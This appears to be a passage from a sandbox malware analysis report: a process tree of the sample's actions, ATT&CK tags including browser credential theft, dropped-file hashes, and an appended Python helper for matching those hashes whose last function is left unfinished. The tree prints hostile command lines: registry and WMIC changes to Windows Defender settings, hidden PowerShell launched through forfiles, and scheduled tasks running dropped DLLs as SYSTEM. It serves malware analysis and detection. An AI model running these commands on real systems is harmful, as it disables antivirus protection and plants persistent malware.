        - System Location Discovery: System Language Discovery
        PID: 2716

        \??\c:\windows\SysWOW64\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
          PID: 3496

    C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      - Indirect Command Execution
      PID: 3888

      C:\Windows\SysWOW64\cmd.exe
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        PID: 3900

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell start-process -WindowStyle Hidden gpupdate.exe /force
          - Command and Scripting Interpreter: PowerShell
          - Drops file in System32 directory
          - Modifies data under HKEY_USERS
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 3488

          C:\Windows\SysWOW64\gpupdate.exe
            "C:\Windows\system32\gpupdate.exe" /force
            PID: 1872
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bOYLEOfZCACcRQIJvG"
    PID: 5084

  C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
    PID: 216

    C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
      - Indirect Command Execution
      PID: 3644

      C:\Windows\SysWOW64\cmd.exe
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        - System Location Discovery: System Language Discovery
        PID: 1716

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
          - Command and Scripting Interpreter: PowerShell
          - Drops file in System32 directory
          - System Location Discovery: System Language Discovery
          - Modifies data under HKEY_USERS
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2912

          C:\Windows\SysWOW64\Wbem\WMIC.exe
            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
            - Suspicious use of AdjustPrivilegeToken
            PID: 4512

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\FDxSmxakU\tpuPfd.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FnGigHNXGPuYnow" /V1 /F
    - Drops file in Windows directory
    - Scheduled Task/Job: Scheduled Task
    PID: 2292

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "FnGigHNXGPuYnow2" /F /xml "C:\Program Files (x86)\FDxSmxakU\hRyNhQz.xml" /RU "SYSTEM"
    - Scheduled Task/Job: Scheduled Task
    PID: 2152

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "FnGigHNXGPuYnow"
    PID: 4408

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "FnGigHNXGPuYnow"
    PID: 2948

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "DfiACOcNeeEuzZ" /F /xml "C:\Program Files (x86)\tEZYwqVfuQYU2\lPMjDmV.xml" /RU "SYSTEM"
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID: 3504

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "DXKOGWDrZMiLW2" /F /xml "C:\ProgramData\IrAQtycGxHJKWAVB\GgSMcwV.xml" /RU "SYSTEM"
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID: 3476

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "WycbLMNWffCalOPaD2" /F /xml "C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\ESFWuTA.xml" /RU "SYSTEM"
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID: 2724

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "SCruIlpVLZHSGSIWWcc2" /F /xml "C:\Program Files (x86)\TjUkTRKCSiJkC\EwNGXZF.xml" /RU "SYSTEM"
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID: 860

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gXgiPdpSGbihZCqEr" /SC once /ST 01:20:51 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\BhywXhhbcuWpvQvH\cGCpnPFL\JwnnGAL.dll\",#1 /ydidlSdK 385104" /V1 /F
    - Drops file in Windows directory
    - Scheduled Task/Job: Scheduled Task
    PID: 5016

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gXgiPdpSGbihZCqEr"
    PID: 4212

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "hzhNAJUNSjjdIpELG"
    PID: 2912

  C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 1972
    - Program crash
    PID: 768

\??\c:\windows\system32\rundll32.EXE
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\BhywXhhbcuWpvQvH\cGCpnPFL\JwnnGAL.dll",#1 /ydidlSdK 385104
  PID: 4228

  C:\Windows\SysWOW64\rundll32.exe
    c:\windows\system32\rundll32.EXE "C:\Windows\Temp\BhywXhhbcuWpvQvH\cGCpnPFL\JwnnGAL.dll",#1 /ydidlSdK 385104
    - Blocklisted process makes network request
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    PID: 3984

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gXgiPdpSGbihZCqEr"
      PID: 1592

C:\Users\Admin\AppData\Local\Temp\service123.exe
  C:\Users\Admin\AppData\Local\Temp\/service123.exe
  - Executes dropped EXE
  - Loads dropped DLL
  PID: 2460
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (1)
  - Credentials In Files (1)
Downloads
-
Filesize
2.1MB
MD5d411dfa84366507401e900d305edcf93
SHA13211a9b9f21ef169db2c354c4eeed67a6224dd97
SHA2561e3a0c164b6c5b9e47a6239731bd3fcf643d26bd52edefa58b9815bfa3f46205
SHA512c79073208cf89afd96f017c517c5af517c4e622556a8029f0db0d2c4300a9ed7d9b8846bb7c38606a8fd7ecc18b6b0123a31e8929f6e77f1a655a89ef35bacc9
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5cf624a35ee40ce25109eaf9b54f7f4ab
SHA1db7c5a4b8097e46b137b4b8c38ce806681ef0f5f
SHA2565420e2450014d8d873a2e98a639ada9516cdf2b7366c6f84d6d8c7f169b027a1
SHA512bbfb5d030e1dffdb08733621173363dadb37e70c48815b79ac14ac8f33b691bf1198c1681ea59f01b5e21acdaccb1b6162b4370ec9a4d18a6d54b48766dff8c0
-
Filesize
30KB
MD57cf51d8f03aa6753df3be2d79e8242b0
SHA1cae2fb39fe1c988f98afd82ebd89919b0d4c903a
SHA25609dfb7ebeb02fed32a12719aad3f9e483c7555cf607499dd30d9bf31e910d33c
SHA512e7cdf06effe2c806eecfaa8a9aa4097196a6937f8f90b96b1bb45c81ee846d110df71e090bfeb913383a30d4089c5c136dfc3e7ffbb340f6216c022366bef1c0
-
Filesize
2KB
MD57ef69911439efbfce917471c31f0c86f
SHA1f28365cbe8565c5070af973fe188391c83b07a23
SHA2566d017267e7cdf31c4dee6c56722c65cbabf434379e36202f7c4cf10b08b0bc75
SHA51255085bc668fb39863b9969b8127fd2aec8970ea4ff1e1450b730f5e526e9a5663eceab900a825d0a63f9a88b0bae1ca7b2cd9249f5c5708d10ad88d454cb482c
-
Filesize
15KB
MD52d1822047daae3677bce4617979ef56f
SHA1df7ad0dd9ea09416ce8405991328f2d083e8235c
SHA256e8efae576f263b615f07f992139e264ee870fd6b08e5b4c39103e87019bae806
SHA512eac4f11f889361bac0f600fd4e5df9bc07fc429eb7fce1fb75a1477812207941ca2a8d7c7410acc8801a45d34b9853fcc9f205429676534d7fe342a82cb7a15b
-
Filesize
15KB
MD5a62fcd65c472549e0b6b1c4244b4bf07
SHA1c88a7f0eb085baa53356cfd961177dc372fc2ecf
SHA256b4f15cef77d000bd0588471404c670db97557f9f4069e29878156890d9448497
SHA51252ee39d0ce74d35ab238778daec885b13e8bded0559d4e66cd398f0b6c61604ccb144687edef0c794be5a5f278277ec7c64f51046b0e20ce689daadd7979d29e
-
Filesize
6.4MB
MD546ae45c09fb5d6fbcedbcab1191d0bf8
SHA116468bd990d28a9357735d3253de4858c55b4dd9
SHA256949e6819e781f199332657e2011b78fc7e8e6f3109541fd449a53b30783f079e
SHA512c0918caec3296217d18e2ba67673ebe61a4cd16872a021d3d2f15f3acc26ab1a72cfb4206d814780a9354699e21431399bd892bb5e5eb8da33f55a345f0b2cf6
-
Filesize
13.1MB
MD55a5d6ad84a7462708c1f4d51ad7ee9cb
SHA1de68d6b39aef7dcd49216308110d7b1be4cbf649
SHA25664863ef0c89a91f133ac968f1774e39c0c7fa5c69beb825b3db5e55c4ba60987
SHA5120cd56d1e7cc34bd56acebd94ee9370ec7aee90b7f86ea6234a6147480d84c4581a5fac85ce73b0cd00a7f7df5e830e4c4dca597ad037a32e84b769b369b50e22
-
Filesize
183B
MD55894fc443d20e14cf58c39182e36b005
SHA1b499cc3083b0f78dcba99f371e03b1fba280f9f0
SHA256b2771d1657dde2b930007d61ff633919560d9aa7a0a07d9671c962721ed6d88d
SHA512f4d8459a7d81f8c7bb4c6ccdef7404032117b9423fb63613d0ad8918453f8078c2ae308ad1167cd7f7b7a409a5807307712b38f3616f6d15c394efd44a65109c
-
Filesize
88KB
MD517f01742d17d9ffa7d8b3500978fc842
SHA12da2ff031da84ac8c2d063a964450642e849144d
SHA25670dd90f6ee01854cecf18b1b6d1dfbf30d33c5170ba07ad8b64721f0bdcc235e
SHA512c4e617cd808e48cc803343616853adf32b7f2e694b5827392219c69145a43969384d2fc67fa6fa0f5af1ca449eb4932004fbcdd394a5ba092212412b347586f0
-
Filesize
80KB
MD57768e3da5a04fa817e7dccc2508a411c
SHA12bbd7b9ffea0fe8f19992b39593910dc5808c013
SHA256fe351e980e0c098f33615e0d54aef87eb79aebb9a0b179f33bcf0f93fc9a6338
SHA512e219cf8a0929a211336d4e6e4345603ddc209df5994755ac144870b93d6d72d96cb4617aace8015195e62c031146043b255409576b3bbd89a725fe8c1ef8ba67
-
Filesize
155KB
MD5795674562f6495081500cd0e7c1770f1
SHA1bfe59f036f08213b8299ab6c1a5cbf361b387210
SHA2561f841ec41003f74e656735ed74b84365427ef6e330c312fa458d2cee9cedc99b
SHA512fa6250afb16f5a69d070dc261df858b23d740054beaf8469842018d805e4af0803cb98d3247e14c09f0613745d7282f5b3290f9157a5d3c96a0f8f313286db2d
-
Filesize
197KB
MD5bfddafd620167cd795a3d17895e4f5d7
SHA12c545940e7da32caddc07fbc96e3b543a085a34d
SHA2562f994d1555703739de1f4498d0196c5f96dfffad0eb60b161718c16168b53bd1
SHA51255dbfcd5083e411d1361b2219c752543a2aa7587c4eeb876407b33d421b64fb432da2cedc629e92c8d45702058cd47e74d645aedac730b3dd3d65b611e9c260e
-
Filesize
71KB
MD5dc3270c15c0bb4bff94a16575377f403
SHA1333c5003215e0a903cbdc9f8d1747d46df34ada2
SHA256ebfc54652c2d3b4fc0f69b06972b056060e55f6aab06bf0caa1328c5e76eb118
SHA512327ff12b3b5ad264aa6478227658d3d59073a6606ec675236df0f0d33d723fa9e7fbf8a80b5cdbab1b2522ae51769c5425fd95f2c870fb546199de95478e3e88
-
Filesize
154KB
MD5ff678e483e580cfb5c78b0485645fc59
SHA1fe3e0db48f4ae86040a4cda5f0c5cf012a09fd28
SHA2560e97b0f87c7b9ec74d9162fc6e41a800f60825167c50845031c2207dcddf3346
SHA512637e3662f6d541d14ac2817e301b3d882e159bbf08f15f8bac1eee2a29973cd999efde1252db0a4a085741f8ea0d99bbbfb175114058937e2074dc7aa1d419cb
-
Filesize
1.3MB
MD58dad91add129dca41dd17a332a64d593
SHA170a4ec5a17ed63caf2407bd76dc116aca7765c0d
SHA2568de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783
SHA5122163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50
-
Filesize
268KB
MD559a15f9a93dcdaa5bfca246b84fa936a
SHA17f295ea74fc7ed0af0e92be08071fb0b76c8509e
SHA2562c11c3ce08ffc40d390319c72bc10d4f908e9c634494d65ed2cbc550731fd524
SHA512746157a0fcedc67120c2a194a759fa8d8e1f84837e740f379566f260e41aa96b8d4ea18e967e3d1aa1d65d5de30453446d8a8c37c636c08c6a3741387483a7d7
-
Filesize
5.6MB
MD50eac9fa387647c388fab4239bfe5a0b5
SHA1fafb679a58b8d85b50af18a4c0a7402fa890ee39
SHA25665900b1bc22af5bb974385f7f2a8742ffd12860010cbe0aedb62ff5598998414
SHA51270042322b98681c73f83f05e03f61a8ad985944cf07633653706c9b87be738e6698099f40328058ee80d4063f8e85aba7c674c3af079cf082376fb1dc9005e86
-
Filesize
527KB
MD5fada0e603afb67d1893cde008e118dc7
SHA1cb13da46b767c873ba9b563dc69ab3c6dd45d6ed
SHA256b02fd24536f917bbd110da4712106a391e453cc6323f4e6c60a683f077b1514e
SHA5123f6a2ee6f612d3b18708318660ac0a00efb2bdab202eba9dd0539f65bf8f2a125c3717b6cf254c15520b0a34b016ea9ccd1d06e88d408bad94f79a2b1a5a4da3
-
Filesize
101KB
MD591c7e0eda0d840c320815c6e914b02cf
SHA17024fe76f7585b8a634e762a1d5686fbba5f6437
SHA2560ac64c91f49af4a1b86446c85e53e9ee899e27047368f9819a3c16c6e53454ab
SHA5123e59849b891a833807c6c6eb6253c57effcf3c2b95bb430a17ce676e4b5bb3fb0d335effd6a794e2a910f29fa68d11f81e6ddc3a8e18336fc5e80c49891d8cf0
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize4KB
MD58b087de0136e2dba9769520a9ac4f1ee
SHA1c8a47eee764a953026fd8d1d6a21cf8abe174b51
SHA25682b7f2d89eeb273fa991f643fa784b90100091a707454a526bb85736d0475796
SHA512ce8d2366c642459c48eb9fb00e702d92f005c6063cc8fdb5bf60f49f2316d10ef36f80b039b031b0c4574b4c260fdc6358672ddbdc252f2a0316b024c86b95ae
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize4KB
MD5efcf4b6cc4a1c8e8af6bcb4719e2fac7
SHA13682567e9c012db6fb65216ff1dadeea1b190bc7
SHA256563d2b8c18e8f6a0f76eda85e6e47a17142ec080600d02205fadc36b4c7bdc6d
SHA5122b3efff8d1e4ca4e74676015321a5424e92d53bba03a1658e7742a9db88c51bcff23b4b9340d51873763fe42e6d7bef4be4928bb1d0d9577e74d891fb0611ec5
-
Filesize
6KB
MD5b9e340f85e3228d0df652af3d8cd4eb8
SHA17290a9a33cfa407f5b8f5323c14002cf6b2a4650
SHA256bb7160d187e79c59144382a1dc1db05f55063ff5a8874e4ef35a9ab9522509f0
SHA512ca5e268d4608f575224602d7755c26fb00300e6198eddb8d38002e16358e9c960d18db3f64b0c916bcf51a2f49806702140ac2157e442a36bdcf072391d7a97f
-
Filesize
315KB
MD5115d4283a126ef5b8da99582cfaf9b17
SHA1bc3343e28434368e95ab31f1edeaa1baaffc9e95
SHA256e1cad6961c9fcbbcb8a974c5d6cc58a248d2d69880d1ca8355ef8a92c3bc8afc
SHA5121d78d9f9b8a2e7bb3c7505edd808e3dae5b9b782483ecd1de07012e3dd30eb21e3b13712177b64a5c8aa229244f1eb2c6794aa44b5ea2dd2771b5b3109a0f4e4
-
Filesize
6.3MB
MD5cc70a5edd4a5a8db874c97d21119f59d
SHA14b1d7b51e875a4b6aa05967459e17ea0d3286f39
SHA2564311121804332b647e02280a9c551c85c16a46f24f2d2107a9bdceaa8923afa1
SHA512f2806d7988073539723708821f0246021a77724c992901282036f77bdb57ddf7e495644d7f00c6f96fd3aa0fa65e6142ed9e823c2cab1474d41ee5bc083b2268
-
Filesize
144B
MD5604412d14042ed3537e121774b7988a1
SHA1f6c7cd482d0a2bf28e6b6b63a9b3cf8268d8e692
SHA25693cdd5eddec0e5602d1811437654ea75ff17aae196edf4d0cb45e85160c46a13
SHA512bf15cafc971000cf5886401315ad65e30280b8e1dbc8fb6e15290a280109586920676c57a0d4b8af28cb1b742cdc84a5b5b473cb5592b8e229d3caa2f82698e0
-
Filesize
146B
MD566232297ab8364e4ab1413149fa28778
SHA1b94045bf663494af1907a461ec36d60d5e2c2b0c
SHA256317a69633fe3714a2321edb7223a9dc68f84aab3477567f400772a3abe16c13f
SHA51201abaf92bec4ddb5f64c13aecbd24a58d814dacc32218709cef1c8d53cdce32ad030957661364b8d4a6bb6ae0b8f430aba1064d888bd89e0e18d8587ef21d9ec
-
Filesize
143B
MD5cc3d3ed7869701b037203bea64221135
SHA188a4818165efc31cfac7534aa1cef73dc08972ce
SHA256a1340d619e4952340929cf07848de213d5ab27e2b9ab8399a52d1c8fdec8ab67
SHA512f0d8d4fd64e1aaa30d0045017cbc36c5297dd6725a87a4dd8d528f80cc838de9295e2483eae5296ab774616b88bccdce0061f495c3e93c317236301dcece7981
-
Filesize
141B
MD524edf70cd3dfaed22ccbfcdb46fedb6a
SHA134ce910db6cc63654a3bbc117397ad26c6136ac9
SHA2562d2114848d90467e84cce62f55f894488f751e1c5ce38d9a83f265d5b330b4ed
SHA512657cbf6b5bcaf8a20169636b55537cdf5dcc7995406fec3ed83941826c1292b118632f780183b2b8ea4bb251ac4740e7dfa472d73c9d9863efcdf3ef441a7a69
-
Filesize
142B
MD52984059e341e42c0f34e0b5fe4f2f3d1
SHA1444fd218f43d8a4286c024f08d84a8ac38e18bba
SHA2566214a167b290b206611f527f281ae5ace91918cd8d6e77a1c8a01a13465b99ba
SHA512786be5ea24debffbfbc5737fa497ccef97507bb0a76f93544a9f8e5f02f89a5e83382aa78058d962de3330addd86aee5be32b8c15382f79666ff94885cace168
-
Filesize
142B
MD5ed2fc077f746f28281b9fe0626c41b61
SHA1fac7d476679773b6beef32c9c99a3d9d5df9ceed
SHA256b48e03c1e333435ab55a86861d9655f6ddab65cde214995dfd1cf07e6b821b6d
SHA51277e5d23a2139afaeeee9aad0b8ca1751b6187b1e8bdf72114fdbd094f34aee00ef952305575e9c5976a0a80fb049dba1ae1a2030c24b48c60643ebfcb5966f77
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
48KB
MD5144ea77a7bf8cebd601ba88147b1e3a5
SHA11c198c5d5a11bb1a6f7e8482741d7c201b095929
SHA25605f013509826fb8a690403baa9e8879d577b67fc9a7e8c1f09aa054a9339eca2
SHA51220dce3609d932c6c7d40d70d69d826448c6175470c27fabbde132bfb198b207b5d7477dbc53280dee5ed40d88a646ab1164a3826803b961180db46d628c3ab55
-
Filesize
145KB
MD5
3445dfd51b2f41d60d5c2508b4be33d5
SHA1
bd40e271e588bbfffc3624c50fcd15cb5cf382be
SHA256
e2ca5e4bd2fbdb52069c90182fea1873b111a2045f7e26cdb3772896d1a199ef
SHA512
5da1c72b1749db04f1cd71c20e536b8899d2fe05ca730233bd5e6db91cbfa7e45d2ec157668fe5d7a1ef28377b206f277a945106dff6a635942129810ab62c74
-
Filesize
28KB
MD5
aad725ff62836169e0b09a8833c70b7a
SHA1
09b5c0d4ea306c67708cf853e8e89a34f9b1682b
SHA256
0cb74d8aad8805c081c5585aef216828c010545469164067294d38b9410d3e2c
SHA512
995862ed27b01cdff796d376def382f3e16010a726b0ccbb5444eafaffd6515d7a1c1d8af11915c0df19860601f113a3e047a6094e579ce1939a039afef6a89a
-
Filesize
3.3MB
MD5
2e9277a5dd088949086d450da0e5f4e8
SHA1
c939886464bb65dc4667d8e477d97a619eadddfc
SHA256
7de51a1913ca3b10027f83d99ccccb166d6a3c06ca5d6358f260342dbacdbf6a
SHA512
9f16c77cd90e1b6657f3d2cbd131273bf24becff01c198690ebadb2c454e3f84b88a7e9c6fecdb7f564e1aa99a5583bbd1933e5db408efce3a9095776fa1a056
-
Filesize
620KB
MD5
8b8fb5ec8d5fca88463bb9ad9fa23344
SHA1
cbc26ffca78f03b146c84925749029ca2777b30a
SHA256
b777ccc04c05ca5b0a6ff68e6c46ad9837dc02311ee132ad6a81910f4a1ed54f
SHA512
3763752732822b80622d5260745313575993f535b1fed49434483b644009eb09ab91a1a7f32df22ada477d873ddb0726e0ab5e9416b08fa70e6446d8e981104d
-
Filesize
66KB
MD5
97386f12a1c19e14451f5e4697e5fdc8
SHA1
6bee5f0a7b8863779a02491c93cb46cd8b6916ef
SHA256
130632508b1a7f6293bb67e13441e0e21164a5df8e5dabaec9ebe73a35544bad
SHA512
66dbf574585bd72f2487f341026a811533740241bea1a33395f8967c4b9283aa35c7d765a03337cdec4f56ea5940ef02491d9fdee497a2deb5fc4296d19261e2
-
Filesize
106KB
MD5
7aa3274f9d767fe6c2994b455fe33a64
SHA1
b1bd2b0635710fa8252b1300a96700c9569e84cb
SHA256
5beb99a5e1e83b8f5e4a6c6185348f689f73071c0b68b6a70964ea53c5c17f22
SHA512
9fa282afc951612ca26c5b78bb3e2091b6cb3b17b2ad21f67a2f79387161519dbf80c52c2ad62e8575abebfef7ec48a296390a9a8a678db31bb09d01ff04f4cc
-
Filesize
26KB
MD5
c66bc949390c8af8573f877f506d2a6c
SHA1
68730f0ac9e023eecfec9c8b1546e6c8678dc54f
SHA256
ac861ea9320c0ec16c1c8eaa68fbf35dcff977d4e980bd50cdc7195d6f00e9e4
SHA512
fd498a872596843e3161955d482371c7ca4690105b5ed4417d26b3b9533c0ac1e7a9627c4900d38320800eb30fc20b1377bb64bbf909b896e31ec401e057d0a8
-
Filesize
1.1MB
MD5
c190e5d70fdcdd1cbeaa23de04795c97
SHA1
86abddf9d67aabd6d744e12114c2764d2cba2156
SHA256
4e60bd8e5d8676f1b2ca30f06c5bb858cd6db35801ffbf6b6ceec336d880e808
SHA512
328e80e68391d0e84b8a02c6b1a9231a8376c45286e6669880a65a140943f55e9e0e83c16dd4fc636811298f583d4570ca9b718bd0ee19ef8ec75f711af428d3
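The dropped-file records above are a flat label/value list, one record per file, and the extraction has in places fused the algorithm label to the digest (for example `MD5cc3d3ed7...`). One record deserves a caveat before any of this is loaded into a blocklist: the set beginning `d41d8cd98f00b204e9800998ecf8427e` / `da39a3ee5e6b4b0d3255bfef95601890afd80709` / `e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855` is the digest set of a zero-length file, so it matches every empty file on every host and carries no signal. The Python below is added here as an example and is not part of the sandbox report; it parses the list in both layouts the page uses, recomputes the four digests for a file's bytes, matches only when every listed algorithm agrees, and drops the empty-file record. The two-record excerpt embedded in it is copied from this section; the function names are the example's own.

```python
import hashlib
import re
from typing import Dict, List, Optional

# Constructed excerpt: two dropped-file records copied from the report above in the
# flattened form the page uses (label fused to the hex digest, "-" between records).
# The second record is the digest set of a zero-length file.
REPORT_EXCERPT = """\
Filesize
143B
MD5cc3d3ed7869701b037203bea64221135
SHA188a4818165efc31cfac7534aa1cef73dc08972ce
SHA256a1340d619e4952340929cf07848de213d5ab27e2b9ab8399a52d1c8fdec8ab67
SHA512f0d8d4fd64e1aaa30d0045017cbc36c5297dd6725a87a4dd8d528f80cc838de9295e2483eae5296ab774616b88bccdce0061f495c3e93c317236301dcece7981
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
"""

# Longest labels first so "SHA1" cannot swallow the start of a SHA256/SHA512 line.
LABEL_RE = re.compile(r"^(SHA512|SHA256|SHA1|MD5|Filesize)\s*(.*)$")
DIGEST_HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


def parse_report(text: str) -> List[Dict[str, str]]:
    """Split the flattened hash list into one dict per dropped file.

    Handles both layouts seen on the page: label fused to the value on one line
    ("MD5cc3d...") and label on its own line with the value on the next line.
    Digests whose hex length is wrong for the algorithm (truncated extraction)
    are discarded rather than matched against.
    """
    records: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    pending: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "-":  # record separator
            if current:
                records.append(current)
            current, pending = {}, None
            continue
        if pending is not None:  # value for a label that stood alone on the previous line
            current[pending] = line.lower() if pending in DIGEST_HEX_LEN else line
            pending = None
            continue
        m = LABEL_RE.match(line)
        if not m:
            continue  # unrelated report text
        label, value = m.group(1), m.group(2).strip()
        if not value:
            pending = label
            continue
        current[label] = value.lower() if label in DIGEST_HEX_LEN else value
    if current:
        records.append(current)
    for rec in records:
        for algo, n in DIGEST_HEX_LEN.items():
            if algo in rec and not re.fullmatch(r"[0-9a-f]{%d}" % n, rec[algo]):
                del rec[algo]
    return records


def digest_set(data: bytes) -> Dict[str, str]:
    """The four digests the report lists, computed for one file's bytes."""
    return {
        "MD5": hashlib.md5(data).hexdigest(),
        "SHA1": hashlib.sha1(data).hexdigest(),
        "SHA256": hashlib.sha256(data).hexdigest(),
        "SHA512": hashlib.sha512(data).hexdigest(),
    }


EMPTY_FILE = digest_set(b"")  # d41d8cd9..., da39a3ee..., e3b0c442..., cf83e135...


def is_empty_file_record(rec: Dict[str, str]) -> bool:
    """True when the record is just the digests of zero bytes: not a usable indicator."""
    return any(rec.get(a) == EMPTY_FILE[a] for a in DIGEST_HEX_LEN)


def match_bytes(data: bytes, records: List[Dict[str, str]]) -> List[int]:
    """Indices of records whose every listed digest agrees with `data`.

    Requiring all listed algorithms to agree means a single garbled or colliding
    MD5 value cannot produce a hit on its own.
    """
    mine = digest_set(data)
    hits = []
    for i, rec in enumerate(records):
        algos = [a for a in DIGEST_HEX_LEN if a in rec]
        if algos and all(rec[a] == mine[a] for a in algos):
            hits.append(i)
    return hits


def actionable_records(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Records worth loading into a blocklist: the empty-file digest set is dropped."""
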